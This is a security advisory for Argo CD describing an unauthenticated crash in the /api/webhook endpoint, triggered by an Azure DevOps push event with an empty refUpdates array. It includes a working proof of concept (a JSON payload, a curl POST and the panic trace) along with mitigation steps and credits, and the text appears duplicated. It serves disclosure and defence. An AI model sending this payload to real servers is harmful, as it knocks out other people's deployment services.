Summary
In the default configuration, webhook.azuredevops.username and webhook.azuredevops.password not set, Argo CD’s /api/webhook endpoint crashes the entire argocd-server process when it receives an Azure DevOps Push event whose JSON array resource.refUpdates is empty.
The slice index [0] is accessed without a length check, causing an index-out-of-range panic.
A single unauthenticated HTTP POST is enough to kill the process.
Details
case azuredevops.GitPushEvent:
// util/webhook/webhook.go -- line ≈147
revision = ParseRevision(payload.Resource.RefUpdates[0].Name) // panics if slice empty
change.shaAfter = ParseRevision(payload.Resource.RefUpdates[0].NewObjectID)
change.shaBefore= ParseRevision(payload.Resource.RefUpdates[0].OldObjectID)
touchedHead = payload.Resource.RefUpdates[0].Name ==
payload.Resource.Repository.DefaultBranchIf the attacker supplies "refUpdates": [], the slice has length 0.
The webhook code has no recover(), so the panic terminates the entire binary.
PoC
payload-azure-empty.json:
{
"eventType": "git.push",
"resource": {
"refUpdates": [],
"repository": {
"remoteUrl": "https://example.com/dummy",
"defaultBranch": "refs/heads/master"
}
}
}curl call:
curl -k -X POST https://argocd.example.com/api/webhook \
-H 'X-Vss-ActivityId: 11111111-1111-1111-1111-111111111111' \
-H 'Content-Type: application/json' \
--data-binary @payload-azure-empty.jsonObserved crash:
panic: runtime error: index out of range [0] with length 0
goroutine 205 [running]:
github.com/argoproj/argo-cd/v3/util/webhook.affectedRevisionInfo
webhook.go:147 +0x1ea5
...
Mitigation
If you use Azure DevOps and need to handle webhook events, configure a webhook secret to ensure only trusted parties can invoke the webhook handler.
If you do not use Azure DevOps, you can set the webhook secrets to long, random values to effectively disable webhook handling for Azure DevOps payloads.
apiVersion: v1
kind: Secret
metadata:
name: argocd-secret
type: Opaque
data:
+ webhook.azuredevops.username: <your base64-encoded secret here>
+ webhook.azuredevops.password: <your base64-encoded secret here>
For more information
Credits
Discovered by Jakub Ciolek at AlphaSense.
jake-ciolek Reporter
crenshaw-dev Remediation developer
blakepettersson Remediation reviewer
Summary
In the default configuration,
webhook.azuredevops.usernameandwebhook.azuredevops.passwordnot set, Argo CD’s /api/webhook endpoint crashes the entire argocd-server process when it receives an Azure DevOps Push event whose JSON array resource.refUpdates is empty.The slice index [0] is accessed without a length check, causing an index-out-of-range panic.
A single unauthenticated HTTP POST is enough to kill the process.
Details
If the attacker supplies "refUpdates": [], the slice has length 0.
The webhook code has no recover(), so the panic terminates the entire binary.
PoC
payload-azure-empty.json:
{ "eventType": "git.push", "resource": { "refUpdates": [], "repository": { "remoteUrl": "https://example.com/dummy", "defaultBranch": "refs/heads/master" } } }curl call:
curl -k -X POST https://argocd.example.com/api/webhook \ -H 'X-Vss-ActivityId: 11111111-1111-1111-1111-111111111111' \ -H 'Content-Type: application/json' \ --data-binary @payload-azure-empty.jsonObserved crash:
Mitigation
If you use Azure DevOps and need to handle webhook events, configure a webhook secret to ensure only trusted parties can invoke the webhook handler.
If you do not use Azure DevOps, you can set the webhook secrets to long, random values to effectively disable webhook handling for Azure DevOps payloads.
For more information
Credits
Discovered by Jakub Ciolek at AlphaSense.